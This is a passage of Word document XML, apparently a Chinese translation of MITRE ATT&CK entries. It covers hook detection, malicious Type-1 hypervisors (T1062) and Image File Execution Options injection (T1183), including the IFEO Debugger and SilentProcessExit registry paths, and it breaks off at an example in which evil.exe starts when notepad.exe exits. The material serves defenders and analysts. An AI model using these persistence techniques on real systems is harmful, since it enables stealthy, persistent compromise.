      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8EBE84" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术是基于对系统功能的滥用，因此无法通过预防性控制轻松缓解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182FC8D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C388F62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监视对钩子函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> SetWindowsHookEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SetWinEventHook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的调用。还可以考虑使用工具或通过编程检查内核结构来分析钩子链（为每种钩子类型保存钩子过程的指针）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1940C" w14:textId="48B2119B" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">Rootkits </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测器可用于监测各种类型的</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动，通过比较内存中的代码与对应的静态二进制代码，尤其是检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>跳转和重定向码流，验证活动进程的完整性；还可以考虑制作新进程</w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的快照，由此比对内存中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和引用函数的实际地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F94423" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时，分析进程行为，确定进程是否正在执行异于常规的操作，例如打开网络连接、读取文件以及与泄漏后行为相关的可疑操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB7B9E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理程序</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="103CB613" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C637575" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>: T1062</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9DFF97" w14:textId="531E5355" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6327E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CFDF5BF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45C988C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统调用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F907BA7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DB0A80">
                <w:t>CAPEC-552</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="44E49534" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0421A3A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198F688D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Type-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机管理程序是介于客户操作系统和系统硬件之间的软件层，它为操作系统提供了一个虚拟环境。一个常见的虚拟机管理程序的例子就是</w:t>
      </w:r>
      <w:r>
        <w:t>Xen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Type-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理程序运行在操作系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>统的底层，并且可以通过</w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r>
          <w:t>Rootkit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能来设计，以便向客户操作系统隐藏它的存在。通过中断，这种性质的恶意管理程序会持续存在于系统中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAAB5E0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09102540" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于这种攻击技术是基于对系统特性的滥用，所以很难通过预防控制来减轻这种类型的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71B7AE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A06739" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Type-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>虚拟机管理程序能够通过执行时间分析被检测出来。虚拟机管理程序可以模拟特定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>指令，它们通常可以直接在硬件运行。如果一个指令耗时比在一个不包含虚拟机管理程序的正常系统上运行的时间多几个数量级，那表示可能存在一个虚拟机管理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4EDD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图像文件执行选项注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4D1B3FD6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A444B48" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>: T1183</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5908F9C6" w14:textId="557A2EBC" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4862FAFE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1843C8DA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7D2038" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表，</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A49FA0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>: Autoruns Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530AD2B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>: Oddvar Moe, @oddvarmoe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614271F9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E5159D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="296CE18A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51153B15" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图像文件执行选项能够让开发者把调试器附加到一个程序上。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当进程创建时，存在于图像文件执行选项上的调试器会被预置到程序名称前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并启动一个新的进程</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t>, "C:\dbg\ntsd.exe -g notepad.exe")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36886733" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>图像文件执行选项可以在注册表直接设置或者通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">GFlags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>工具设为全局标记。图像文件执行选项作为调试参数值存在于以下注册表位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE{{\Wow6432Node}}\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，其值对应一个可执行程序，并且被调试器附加上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBEFD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当特定的程序静默退出时，图像文件执行选项也能够启动任意监控程序</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如，当被自身或者另一个非内核级进程永久终止时</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。类似于调试器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静默退出监控可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>GFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具开启或者直接修改图像文件执行选项在注册表项中的配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SilentProcessExit\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BC1B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>比如：当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>notepad.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>退出时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>evil.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>进程会启动：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A22C046" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
